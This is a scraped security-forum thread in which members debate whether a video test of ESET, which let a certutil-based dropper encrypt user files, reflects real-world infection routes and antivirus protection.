- Apr 13, 2013
- 3,165
Again the object is initiated from desktop. It lacks the MOTW embedded via being downloaded from the browser or other internet clients like email and chat. The files download this way contain identifiers.
Just hide your keyboard when not in use, as some admin might sneak in there, modify a sample and launch it from the desktop on a non standard account and infect your system.Further proof there's no need for a home user to pay for a security suite.
When following real world procedures (like AV-test and AV-comparatives) most AV's have near perfect scores. The point Cruel Sister was making in her first video is that allowing a dropper through a LoLbin is a considerable risk factor (you don't know whether the downloaded file is good or bad). Her (in my opinion correct) warning that ESET could do better, triggered a bombardment of critisism that the file dropped was not really malicious. That is why she posted the second video (which dropped something harmefull and bricked user files).Like a normal user would experience downloading a file, or of the process of opening an email etc? So these test, including on YouTube where the file is already on the desktop are only 1/2 the equation, of the malware (sample) already being on the desktop, on the PC?
Thank you for the explanation, Lenny, I appreciate it. From a member who is still learning about these thingsWhen following real world procedures (like AV-test and AV-comparatives) most AV's have near perfect scores. The point Cruel Sister was making in her first video is that allowing a dropper through a LoLbin is a considerable risk factor (you don't know whether the downloaded file is good or bad). Her (in my opinion correct) warning that ESET could do better, triggered a bombardment of critisism that the file dropped was not really malicious. That is why she posted the second video (which dropped something harmefull and bricked user files).
Now they are critising @cruelsister 's video again with the arrgument that it did not come through the "front door". That argument in itself is valid. People can't be infected out of nowhere. But for average PC users the most common routes of infection through the 'front door" are responding to an email with either a prize or an tax invoice. The trick is to trigger an emotion (greed, anger and fear work the best). Another often used rout eof infection is an average home users being redirected to websites looking like an antivirus telling you are infected (using the fear emotion) and you need to download something.
So getting through the front door is trival, but even using the front door approach ESET has its limitations (and CS video shows why they probably missed the 1.8 percent of tthe "in the wild samples, using real world scenario's" in the picture below).
View attachment 282949
By as @Showdara posted, it just confiorms his experience.
Good point, I forgot about that route.It is a convincing video. The attack is not fully real-world but could be if the phishing was a starting point, or the attack was done from the infected flash drive.
Just hide your keyboard when not in use, as some admin might sneak in there, modify a sample and launch it from the desktop on a non standard account and infect your system.
It is not real world. The file needs to be download as stated above for the products to scan for indicators, unless it was as you just suggested from an inserted flashdrive of which again habits like disabling autoruns of those type devices and scans of files on them before using once inserted can negate.It is a convincing video. The attack is not fully real-world but could be if the phishing was a starting point, or the attack was done from the infected flash drive.
I am not following you, are you posting in the correct thread? There is no Microsoft Defender in this video and the user files were bricked. Let's not repeat the discussion of part 1 video.It is a convincing video. The attack is not fully real-world but could be if the phishing was a starting point, or the attack was done from the infected flash drive.
Anyway, some points should be noted:
If we assume that points 1 and 2 are true, we can focus on what information can follow from the video.
- This video (and the previous one) does not show in any way that Eset's overall protection is worse compared to Microsoft Defender.
- The video tests can be misunderstood by many people who think that a failure on the example can prove some minority of the overall protection.
- Eset's detection was presented from the bright side. The malware undetected in the pre-execution stage, was detected in the post-execution stage. The detection was triggered soon after recognizing malicious actions.
- Microsoft Defender currently blocks that method , so it will be probably rarely used in the wild. It is not clear if Eset can have a sufficient advantage by blocking that method (this could increase the number of false positives). Furthermore, the attack can be blocked by a simple firewall rule for Certutil.
- That method is not malicious, so the decision to block it can be considered by the AV vendor if the attack can bypass other protection features.
- Blocking that method is probably uncommon among AVs on default settings (more examples needed).
- That method can be potentially dangerous when the payload is undetected by the AV.
I am not following you, are you posting in the correct thread? There is no Microsoft Defender in this video and the user files were bricked.
Let's not repeat the discussion of part 1 video.
Yes I know, that is why I asked are you posting in the correct thread I also don't understand Andy's "Microsoft Defender currently blocks that method, so it will be probably rarely used in the wild". Microsoft is the champion of big data and compatibility (low FP-rate), when they are blocking something it is most likely for a reason (which IMO adds credit to Cruel Sister's statement in video 1 that it is a risk factor to allow droppers through unusual LoLBin actions).In part 1, MD succeeded in intercepting the attack, not Eset.
That's why he cites Microsoft Defender.
I also don't understand Andy's "Microsoft Defender currently blocks that method, so it will be probably rarely used in the wild".